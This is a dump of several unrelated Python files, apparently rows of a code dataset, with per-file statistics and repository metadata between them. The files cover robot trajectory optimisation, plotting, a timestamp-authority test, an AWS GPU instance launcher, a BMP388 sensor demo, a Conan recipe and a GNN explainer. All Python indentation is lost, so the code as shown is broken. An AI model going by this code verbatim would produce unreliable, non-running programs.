body['q'][fe, cp, 'x'].value = avg_vel * scale * cos(θᵣ)
body['dq'][fe, cp, 'x'].value = avg_vel * cos(θᵣ)
body['q'][fe, cp, 'y'].value = avg_vel * scale * sin(θᵣ)
body['dq'][fe, cp, 'y'].value = avg_vel * sin(θᵣ)
#ol.visual.warn('Should probably also bound x, y!')
body['q'][nfe, ncp, 'x'].fix(total_time * avg_vel * cos(θᵣ))
body['q'][nfe, ncp, 'y'].fix(total_time * avg_vel * sin(θᵣ))
# periodic
periodic(robot, but_not=('x', 'y'))
return add_costs(robot, include_transport_cost=False, include_torque_cost=False)
# def set_quad_motor_limits(robot: System3D):
# """
# >>> robot.make_pyomo_model(nfe=10, collocation='implicit_euler', total_time=0.3)
# >>> increase_motor_limits(robot, torque_bound=5., no_load_speed=100.)
# >>> ol.motor.torques(robot)[0]['Tc'].pprint()
# """
# assert robot.m is not None, \
# 'robot.make_pyomo_model() must be called before calling this function'
# motors = {motor.name: motor for motor in ol.motor.torques(robot)}
# def set_lims(name, torque_bound, no_load_speed):
# motor = motors[name]
# for Tc in motor_['Tc'][:, :]:
# Tc.setub(+torque_bound)
# Tc.setlb(-torque_bound)
# if hasattr(motor, 'torque_speed_limit'):
# tsp = motor.torque_speed_limit
# tsp.torque_bounds = (-torque_bound, torque_bound)
# tsp.no_load_speed = no_load_speed
# for name in ("base_B_base_F_torque", "base_B_UBL_torque", "base_B_UBR_torque"):
# set_lims(name, 2.5, 75.)
# for name in ("base_F_UFL_torque", "base_F_UFR_torque"):
# set_lims(name, 2., 150.)
# # for name in ("base_B_tail0_torque", "tail0_tail1_torque"):
# # set_lims(name, TORQUE, SPEED)
# for name in ("UFL_LFL_torque", "UFR_LFR_torque"):
# set_lims(name, 1., 75.)
# for name in ("UBL_LBL_torque", "UBR_LBR_torque"):
# set_lims(name, 0.75, 50.)
def theoretical_peak_power(*,
mass: float,
pct_mass_for_actuation: float = 0.5,
watts_per_kg: float = 600.,
disp: bool = True):
"""
>>> theoretical_peak_power(mass=sum(link.mass for link in robot.links))
"""
peak_power = mass*pct_mass_for_actuation*watts_per_kg
if disp:
print(f'Expected total power of a {mass:.2f} kg cheetah with '
f'{100*pct_mass_for_actuation:.2f}% of mass for actuation '
f'and {watts_per_kg:.2f} W/kg: mass*actuation*watts_per_kg = '
f'{int(peak_power)} W')
return peak_power
def theoretical_peak_angle_velocity(stride_freq_Hz: float = 3.,
total_angle_deg: float = 180.,
disp: bool = True):
"""Cheetah leg moves from 0⁰ -> 90⁰ -> 0⁰ in about 1/3 of a second. Ie, follows the shape:
position(t) = 90/2 * sin(radians(t/0.3 * 360))
where t = 0..0.3
Differentiating with respect to time:
velocity(t) = 90/2 * cos(radians(t/0.3 * 360)) * 360/0.3
Giving a max velocity of
velocity(0) -> 90/2 * 360/0.3 =
Example code:
```python
from math import pi as π
total_angle_deg = 180.
stride_freq_Hz = 3.
t = np.linspace(0, 1/stride_freq_Hz)
pos = lambda t: total_angle_deg/2 * np.sin(t*stride_freq_Hz * 2*π)
plt.plot(t, 10*pos(t), label='position [deg] scaled by 10')
vel = lambda t: total_angle_deg/2 * np.cos(t*stride_freq_Hz * 2*π) * stride_freq_Hz * 2*π
plt.plot(t, vel(t), label='velocity [deg]')
max_ω_deg = total_angle_deg/2 * stride_freq_Hz * 2*π
plt.title(f'total angle change = {total_angle_deg} deg\nmax angular velocity = {max_ω_deg:.1f} deg/s = {np.radians(max_ω_deg):.1f} rad/s')
plt.legend(); plt.show()
```
"""
from math import pi as π, radians
peak = total_angle_deg/2 * stride_freq_Hz * 2*π
if disp:
print(f'Expected peak angular velocity of a leg moving though '
f'{total_angle_deg} degrees at {stride_freq_Hz} Hz:\n'
f'total_angle_deg/2 * stride_freq_Hz * 2*π '
f'= {peak:.2f} deg/s = {radians(peak):.2f} rad/s')
return peak
# def plot_power_values(robot: System3D, power_arr: List[np.ndarray]):
# import matplotlib.pyplot as plt
# peaks = np.sum(
# np.hstack(power_arr),
# axis=1
# )
# total_time = sum(
# robot.m.hm[fe].value for fe in robot.m.fe if fe != 1)*robot.m.hm0.value
# nfe = len(robot.m.fe)
# plt.plot(np.linspace(0, total_time, num=nfe), peaks)
# plt.title(
# f'Total power output of cheetah.\nPeak power: {int(np.max(peaks))} W')
# plt.ylabel('Total power [W]')
# plt.xlabel('time [s]')
# plt.show()
def relative_tail_velocity(cheetah: System3D, plot: bool) -> Dict[Tuple[str, str, str], ndarray]:
import matplotlib.pyplot as plt
from numpy import degrees, array # type: ignore
import numpy as np
base_B = cheetah['base_B']
tail0 = cheetah['tail0']
tail1 = cheetah['tail1']
diffs = {}
for a, b in ((base_B, tail0), (tail0, tail1)):
for ang in ('psi', 'theta'):
vela = array([a['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
velb = array([b['q'][fe, cp, ang].value
for fe, cp in cheetah.indices(one_based=True)])
# diff = velb[:,0,idx] - vela[:,0,idx]
diff: np.ndarray = vela - velb
diffs[(a.name, b.name, ang)] = diff
if plot is True:
plt.plot(degrees(vela))
plt.plot(degrees(velb))
plt.plot(degrees(diff))
plt.legend((a.name, b.name, 'diff'))
plt.title(f'{a.name} - {b.name}: {ang}, in degrees/sec')
plt.show()
return diffs
def gather_torque_data(cheetah: System3D, datanames: Iterable[str]) -> Dict[str, List[ndarray]]:
import dill
import pathlib
import numpy as np
from physical_education.motor import torques
data = None
for dataname in datanames:
cheetah.init_from_dict(dill.loads(
pathlib.Path(dataname).read_bytes()),
skip_if_fixed=True, skip_if_not_None=False, fix=False
)
datapoint: Dict[str, np.ndarray] = {
motor.name: motor.save_data_to_dict()['Tc']
for motor in torques(cheetah)
}
if data is None:
data = {k: [] for k in datapoint.keys()}
for k, v in datapoint.items():
data[k].append(v)
assert data is not None
return data
| 40.337563
| 146
| 0.541622
| 4,478
| 31,786
| 3.709022
| 0.149174
| 0.013005
| 0.009633
| 0.016858
| 0.377928
| 0.312722
| 0.264315
| 0.229454
| 0.185321
| 0.163827
| 0
| 0.04039
| 0.305984
| 31,786
| 787
| 147
| 40.388818
| 0.712511
| 0.209904
| 0
| 0.201699
| 0
| 0.002123
| 0.150993
| 0.007998
| 0
| 0
| 0
| 0.001271
| 0.004246
| 1
| 0.027601
| false
| 0
| 0.063694
| 0.008493
| 0.11465
| 0.004246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af1dd273f6773d5545946eaa77b49cdb5d3fee31
| 982
|
py
|
Python
|
data_visualization/data_visualization.py
|
or-tal-robotics/mcl_pi
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 3
|
2019-05-07T13:48:45.000Z
|
2020-09-02T15:10:35.000Z
|
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | null | null | null |
data_visualization/data_visualization.py
|
or-tal-robotics/MCL_PI
|
02d9b3bdd68c54afde36da320e1ce4bdc8d057d8
|
[
"Apache-2.0"
] | 2
|
2021-01-28T23:34:21.000Z
|
2021-06-29T05:33:35.000Z
|
#!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def main():
data_komodo = pd.read_csv('komodo.csv',sep=',')
data_armadillo = pd.read_csv('armadillo.csv',sep=',')
data_visualization(data_komodo)
data_visualization(data_armadillo)
def data_visualization(data):
x = data['1']
ref = np.asarray(data['0'])
err = data['2']
x_temp = []
ref_temp = []
err_temp = []
for ii in range(len(ref)):
x_temp.append(np.fromstring( x[ii][1:-1], dtype=np.float,count=3, sep=' '))
ref_temp.append(np.fromstring( ref[ii][1:-1], dtype=np.float,count=2, sep=' '))
err_temp.append(np.fromstring(err[ii], dtype=np.float))
x = np.array(x_temp)
ref = np.array(ref_temp)
err = np.array(err_temp)
plt.plot(x[:,0],x[:,1])
plt.plot(ref[:,0],ref[:,1])
plt.show()
plt.plot(err)
plt.show()
if __name__ == "__main__":
main()
| 25.179487
| 88
| 0.588595
| 148
| 982
| 3.72973
| 0.310811
| 0.092391
| 0.11413
| 0.119565
| 0.076087
| 0.076087
| 0.076087
| 0
| 0
| 0
| 0
| 0.017219
| 0.231161
| 982
| 39
| 89
| 25.179487
| 0.713907
| 0.020367
| 0
| 0.068966
| 0
| 0
| 0.040583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.103448
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af1ff2337c60e542c9bcc64ce74be8ee36948153
| 1,822
|
py
|
Python
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 6
|
2021-02-04T13:15:13.000Z
|
2022-02-04T17:21:40.000Z
|
pyasice/tests/test_tsa.py
|
vgaicuks/pyasice
|
4e955a4aedc319199dfd367d1d092ba99f4fe1c2
|
[
"0BSD"
] | 5
|
2020-10-26T14:43:34.000Z
|
2021-12-27T14:40:10.000Z
|
pyasice/tests/test_tsa.py
|
thorgate/pyasice
|
4423b7251392c7bf6bc5d14800b9b396b8eb2222
|
[
"0BSD"
] | 1
|
2021-07-21T15:36:31.000Z
|
2021-07-21T15:36:31.000Z
|
import hashlib
from unittest.mock import Mock, patch
from asn1crypto.cms import ContentInfo
from asn1crypto.tsp import PKIStatus, PKIStatusInfo, TimeStampResp
from pyasice.tsa import requests, TSA
class MockResponse(Mock):
status_code = 200
headers = {"Content-Type": TSA.RESPONSE_CONTENT_TYPE}
def test_tsa_build_message_imprint():
assert TSA.build_message_imprint(b"test") == {
"hash_algorithm": {"algorithm": "sha256"},
"hashed_message": hashlib.sha256(b"test").digest(),
}
def test_tsa_get_timestamp(demo_ts_response):
tsa = TSA("http://dummy.url")
with patch.object(tsa, "build_ts_request") as mock_build_ts_request:
mock_build_ts_request.return_value = Mock()
mock_build_ts_request.return_value.dump.return_value = "Mock TSA Request"
with patch.object(requests, "post") as mock_post:
mock_post.return_value = response = MockResponse()
response.content = TimeStampResp(
{
"status": PKIStatusInfo(
{
"status": PKIStatus(0),
}
),
"time_stamp_token": ContentInfo.load(demo_ts_response),
}
).dump()
ts_response = tsa.get_timestamp(b"test")
assert isinstance(ts_response, ContentInfo)
mock_build_ts_request.assert_called_once_with(b"test")
mock_post.assert_called_once_with(
"http://dummy.url",
data="Mock TSA Request",
headers={
"Content-Type": TSA.REQUEST_CONTENT_TYPE,
"Connection": "close",
},
)
def test_tsa_existing_response(demo_xml_signature, demo_ts_response):
TSA.verify(demo_ts_response, demo_xml_signature.get_timestamped_message())
| 31.964912
| 81
| 0.63337
| 204
| 1,822
| 5.338235
| 0.333333
| 0.055096
| 0.064279
| 0.066116
| 0.05326
| 0.05326
| 0
| 0
| 0
| 0
| 0
| 0.008989
| 0.267289
| 1,822
| 56
| 82
| 32.535714
| 0.806742
| 0
| 0
| 0
| 0
| 0
| 0.115258
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 1
| 0.069767
| false
| 0
| 0.116279
| 0
| 0.255814
| 0.046512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2278683fee1298b0caf86e836a20709cd9fe8a
| 1,619
|
py
|
Python
|
deploy/gpu/aws/launch_aws.py
|
ysglh/DeepVideoAnalytics
|
ce807cc1595c813250bb4bc7dfc6fb76cd644335
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2019-03-05T00:46:56.000Z
|
2021-11-26T10:20:40.000Z
|
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
deploy/gpu/aws/launch_aws.py
|
jiangxu87/DeepVideoAnalytics
|
e401b3273782409b2604657514bec293d6aa75b0
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 4
|
2021-09-22T07:47:27.000Z
|
2022-01-23T14:16:08.000Z
|
#!/usr/bin/env python
import logging, boto3, subprocess
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='../../logs/cloud.log',
filemode='a')
from config import AMI,KeyName,SecurityGroupName,IAM_ROLE,env_user,key_filename
if __name__ == '__main__':
ec2 = boto3.client('ec2')
ec2r = boto3.resource('ec2')
instances = ec2r.create_instances(DryRun=False, ImageId=AMI, KeyName=KeyName, MinCount=1, MaxCount=1,
SecurityGroups=[SecurityGroupName, ], InstanceType="p2.xlarge",
Monitoring={'Enabled': True, },BlockDeviceMappings=[{"DeviceName": "/dev/sda1",
"Ebs" : { "VolumeSize" : 200 }}],
IamInstanceProfile=IAM_ROLE)
for instance in instances:
instance.wait_until_running()
instance.reload()
print(instance.id, instance.instance_type)
logging.info("instance allocated")
with open('host','w') as h:
h.write(instance.public_ip_address)
fh = open("connect.sh", 'w')
fh.write(
"#!/bin/bash\n" + 'autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 8600:localhost:8000 -L 8688:localhost:8888 -i ' + key_filename + " " + env_user + "@" +
instance.public_ip_address + "\n")
fh.close()
subprocess.call(['fab','deploy'])
| 52.225806
| 189
| 0.546016
| 163
| 1,619
| 5.288344
| 0.674847
| 0.025522
| 0.037123
| 0.053364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034234
| 0.314392
| 1,619
| 31
| 190
| 52.225806
| 0.742342
| 0.012353
| 0
| 0
| 0
| 0.035714
| 0.201376
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af235ba38a9be96557da2c0dd0d6fdf8cdff77b7
| 604
|
py
|
Python
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | 2
|
2021-06-18T09:34:05.000Z
|
2021-06-18T09:52:18.000Z
|
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
Arduino/DFRobot_BMP388-master/DFRobot_BMP388-master/raspbarry/example/I2CReadTemperature/I2CReadTemperature.py
|
giglioq/Ocean-Buoy
|
c30151b7af974733260f57d1d3eefe0a1d63be90
|
[
"MIT"
] | null | null | null |
# Connect bmp388 and esp32 via I2C.
#
# Warning:
# This demo only supports python3.
# Run this demo : python3 I2CreadTemperature.py
#
# connect:
# raspberry bmp388
# 3.3v(1) VCC
# GND(6) GND
# SCL(5) SCL
# SDA(3) SDA
# BMP388_I2C_ADDR = 0x76: pin SDO is low
# BMP388_I2C_ADDR = 0x77: pin SDO is high
import bmp388
import time
# Create a bmp388 object to communicate with I2C.
bmp388 = bmp388.DFRobot_BMP388_I2C(0x77)
# Read temperature and print it
while 1:
temp = bmp388.readTemperature()
print("Temperature : %s C" %temp)
time.sleep(0.5)
| 22.37037
| 49
| 0.652318
| 87
| 604
| 4.45977
| 0.609195
| 0.069588
| 0.06701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128889
| 0.254967
| 604
| 27
| 50
| 22.37037
| 0.733333
| 0.668874
| 0
| 0
| 0
| 0
| 0.097826
| 0
| 0
| 0
| 0.021739
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.285714
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af25fd66be9e5c7407f8446bd876b6900df66a06
| 2,037
|
py
|
Python
|
conanfile_installer.py
|
madebr/conan-vulkan_lunarg
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 4
|
2019-06-08T23:54:02.000Z
|
2020-11-10T20:57:54.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 1
|
2019-08-16T13:27:59.000Z
|
2019-08-16T13:27:59.000Z
|
conanfile_installer.py
|
madebr/conan-lunarg_vulkan_sdk
|
d805ad7c8628587033140dd8bf458c798f355165
|
[
"MIT"
] | 2
|
2019-07-30T20:52:50.000Z
|
2020-06-26T11:00:52.000Z
|
# -*- coding: utf-8 -*-
import os
from conanfile_base import ConanFileBase
class ConanFileInstaller(ConanFileBase):
name = "vulkan_lunarg_installer"
exports = ConanFileBase.exports + ["conanfile_base.py"]
settings = "os_build", "arch_build"
_is_installer = True
def package(self):
if self.settings.os_build == "Windows":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
if self.settings.arch_build == "x86":
bin_folder = os.path.join(base_folder, "Bin32")
tools_folder = os.path.join(base_folder, "Tools32")
elif self.settings.arch_build == "x86_64":
bin_folder = os.path.join(base_folder, "Bin")
tools_folder = os.path.join(base_folder, "Tools")
self.copy(pattern="*.exe", dst="bin", src=bin_folder)
self.copy(pattern="*", dst="bin/tools", src=tools_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Linux":
base_folder = os.path.join(self.build_folder, self._source_subfolder)
bin_folder = os.path.join(base_folder, str(self.settings.arch_build), "bin")
self.copy(pattern="*", dst="bin", src=bin_folder)
self.copy(pattern="LICENSE.txt", dst="licenses", src=base_folder)
elif self.settings.os_build == "Macos":
base_folder = os.path.join(self.build_folder, self._source_subfolder, "macOS")
self.copy(pattern="*", dst="bin", src=os.path.join(base_folder, "bin"))
def package_info(self):
self.cpp_info.bindirs = ["bin"]
if self.settings.os_build == "Windows":
self.cpp_info.bindirs.append("bin/tools")
for bindir in self.cpp_info.bindirs:
bindir_fullpath = os.path.join(self.package_folder, bindir)
self.output.info("Appending PATH environment variable: {}".format(bindir_fullpath))
self.env_info.PATH.append(bindir_fullpath)
| 46.295455
| 95
| 0.63623
| 257
| 2,037
| 4.836576
| 0.249027
| 0.088496
| 0.080451
| 0.102977
| 0.552695
| 0.509252
| 0.411907
| 0.292035
| 0.255833
| 0.255833
| 0
| 0.006984
| 0.226804
| 2,037
| 43
| 96
| 47.372093
| 0.782222
| 0.010309
| 0
| 0.171429
| 0
| 0
| 0.117676
| 0.01142
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.057143
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af26f7f77af7f12e0aa08bff53add63e6fd4a8b4
| 10,384
|
py
|
Python
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 2,350
|
2021-09-12T08:32:50.000Z
|
2022-03-31T18:09:36.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 588
|
2021-09-12T08:49:08.000Z
|
2022-03-31T21:02:13.000Z
|
torch_geometric/nn/models/gnn_explainer.py
|
NucciTheBoss/pytorch_geometric
|
e220a2c08fa1b2f1672d616c22eac2a67b5c8967
|
[
"MIT"
] | 505
|
2021-09-13T13:13:32.000Z
|
2022-03-31T15:54:00.000Z
|
from math import sqrt
from typing import Optional
import torch
from tqdm import tqdm
from torch_geometric.nn.models.explainer import (
Explainer,
clear_masks,
set_masks,
)
EPS = 1e-15
class GNNExplainer(Explainer):
r"""The GNN-Explainer model from the `"GNNExplainer: Generating
Explanations for Graph Neural Networks"
<https://arxiv.org/abs/1903.03894>`_ paper for identifying compact subgraph
structures and small subsets node features that play a crucial role in a
GNN’s node-predictions.
.. note::
For an example of using GNN-Explainer, see `examples/gnn_explainer.py
<https://github.com/pyg-team/pytorch_geometric/blob/master/examples/
gnn_explainer.py>`_.
Args:
model (torch.nn.Module): The GNN module to explain.
epochs (int, optional): The number of epochs to train.
(default: :obj:`100`)
lr (float, optional): The learning rate to apply.
(default: :obj:`0.01`)
num_hops (int, optional): The number of hops the :obj:`model` is
aggregating information from.
If set to :obj:`None`, will automatically try to detect this
information based on the number of
:class:`~torch_geometric.nn.conv.message_passing.MessagePassing`
layers inside :obj:`model`. (default: :obj:`None`)
return_type (str, optional): Denotes the type of output from
:obj:`model`. Valid inputs are :obj:`"log_prob"` (the model
returns the logarithm of probabilities), :obj:`"prob"` (the
model returns probabilities), :obj:`"raw"` (the model returns raw
scores) and :obj:`"regression"` (the model returns scalars).
(default: :obj:`"log_prob"`)
feat_mask_type (str, optional): Denotes the type of feature mask
that will be learned. Valid inputs are :obj:`"feature"` (a single
feature-level mask for all nodes), :obj:`"individual_feature"`
(individual feature-level masks for each node), and :obj:`"scalar"`
(scalar mask for each each node). (default: :obj:`"feature"`)
allow_edge_mask (boolean, optional): If set to :obj:`False`, the edge
mask will not be optimized. (default: :obj:`True`)
log (bool, optional): If set to :obj:`False`, will not log any learning
progress. (default: :obj:`True`)
**kwargs (optional): Additional hyper-parameters to override default
settings in :attr:`~torch_geometric.nn.models.GNNExplainer.coeffs`.
"""
coeffs = {
'edge_size': 0.005,
'edge_reduction': 'sum',
'node_feat_size': 1.0,
'node_feat_reduction': 'mean',
'edge_ent': 1.0,
'node_feat_ent': 0.1,
}
def __init__(self, model, epochs: int = 100, lr: float = 0.01,
num_hops: Optional[int] = None, return_type: str = 'log_prob',
feat_mask_type: str = 'feature', allow_edge_mask: bool = True,
log: bool = True, **kwargs):
super().__init__(model, lr, epochs, num_hops, return_type, log)
assert feat_mask_type in ['feature', 'individual_feature', 'scalar']
self.allow_edge_mask = allow_edge_mask
self.feat_mask_type = feat_mask_type
self.coeffs.update(kwargs)
def _initialize_masks(self, x, edge_index, init="normal"):
(N, F), E = x.size(), edge_index.size(1)
std = 0.1
if self.feat_mask_type == 'individual_feature':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, F) * std)
elif self.feat_mask_type == 'scalar':
self.node_feat_mask = torch.nn.Parameter(torch.randn(N, 1) * std)
else:
self.node_feat_mask = torch.nn.Parameter(torch.randn(1, F) * std)
std = torch.nn.init.calculate_gain('relu') * sqrt(2.0 / (2 * N))
if self.allow_edge_mask:
self.edge_mask = torch.nn.Parameter(torch.randn(E) * std)
def _clear_masks(self):
clear_masks(self.model)
self.node_feat_masks = None
self.edge_mask = None
def _loss(self, log_logits, prediction, node_idx: Optional[int] = None):
if self.return_type == 'regression':
if node_idx is not None and node_idx >= 0:
loss = torch.cdist(log_logits[node_idx], prediction[node_idx])
else:
loss = torch.cdist(log_logits, prediction)
else:
if node_idx is not None and node_idx >= 0:
loss = -log_logits[node_idx, prediction[node_idx]]
else:
loss = -log_logits[0, prediction[0]]
if self.allow_edge_mask:
m = self.edge_mask.sigmoid()
edge_reduce = getattr(torch, self.coeffs['edge_reduction'])
loss = loss + self.coeffs['edge_size'] * edge_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['edge_ent'] * ent.mean()
m = self.node_feat_mask.sigmoid()
node_feat_reduce = getattr(torch, self.coeffs['node_feat_reduction'])
loss = loss + self.coeffs['node_feat_size'] * node_feat_reduce(m)
ent = -m * torch.log(m + EPS) - (1 - m) * torch.log(1 - m + EPS)
loss = loss + self.coeffs['node_feat_ent'] * ent.mean()
return loss
def explain_graph(self, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for a graph.
Args:
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
# all nodes belong to same graph
batch = torch.zeros(x.shape[0], dtype=int, device=x.device)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, batch=batch,
**kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description('Explain graph')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, batch=batch, **kwargs)
loss = self.get_loss(out, prediction, None)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid().squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.ones(edge_index.size(1))
self._clear_masks()
return node_feat_mask, edge_mask
def explain_node(self, node_idx, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for node
:attr:`node_idx`.
Args:
node_idx (int): The node to explain.
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
num_nodes = x.size(0)
num_edges = edge_index.size(1)
# Only operate on a k-hop subgraph around `node_idx`.
x, edge_index, mapping, hard_edge_mask, subset, kwargs = \
self.subgraph(node_idx, x, edge_index, **kwargs)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, **kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description(f'Explain node {node_idx}')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, **kwargs)
loss = self.get_loss(out, prediction, mapping)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid()
if self.feat_mask_type == 'individual_feature':
new_mask = x.new_zeros(num_nodes, x.size(-1))
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
elif self.feat_mask_type == 'scalar':
new_mask = x.new_zeros(num_nodes, 1)
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
node_feat_mask = node_feat_mask.squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.new_zeros(num_edges)
edge_mask[hard_edge_mask] = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.zeros(num_edges)
edge_mask[hard_edge_mask] = 1
self._clear_masks()
return node_feat_mask, edge_mask
def __repr__(self):
return f'{self.__class__.__name__}()'
| 39.037594
| 79
| 0.600443
| 1,357
| 10,384
| 4.397937
| 0.180545
| 0.045576
| 0.044236
| 0.032172
| 0.561327
| 0.511227
| 0.468834
| 0.427279
| 0.41756
| 0.396783
| 0
| 0.008545
| 0.289965
| 10,384
| 265
| 80
| 39.184906
| 0.800895
| 0.305759
| 0
| 0.44586
| 0
| 0
| 0.048978
| 0.003912
| 0
| 0
| 0
| 0
| 0.006369
| 1
| 0.044586
| false
| 0
| 0.031847
| 0.006369
| 0.11465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2bf330f5c58cef255d60fd7059e9b558223019
